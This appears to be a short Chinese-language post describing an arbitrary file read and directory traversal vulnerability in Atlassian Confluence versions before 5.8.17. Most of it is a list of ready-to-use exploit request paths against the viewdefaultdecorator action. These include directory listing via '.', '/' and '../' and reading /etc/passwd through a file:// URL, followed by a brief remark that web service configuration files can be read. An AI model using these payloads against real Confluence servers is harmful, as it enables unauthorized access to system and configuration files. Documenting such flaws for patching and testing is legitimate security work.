影响组件: Atlassian Confluence
Atlassian Confluence 小于5.8.17版本的服务存在任意文件读取和目录遍历漏洞
/spaces/viewdefaultdecorator.action?decoratorName=.
列出当前目录
/spaces/viewdefaultdecorator.action?decoratorName=/
列出web服务的根目录
/spaces/viewdefaultdecorator.action?decoratorName=../
列出上一级目录(对有些服务无效)
/spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd
通过file协议可以做到读取系统文件和目录
不过不是root权限, 所以危害有所降低, 但是可以读取web服务的配置文件, 所以危害任然不可小瞧
全部评论 (1)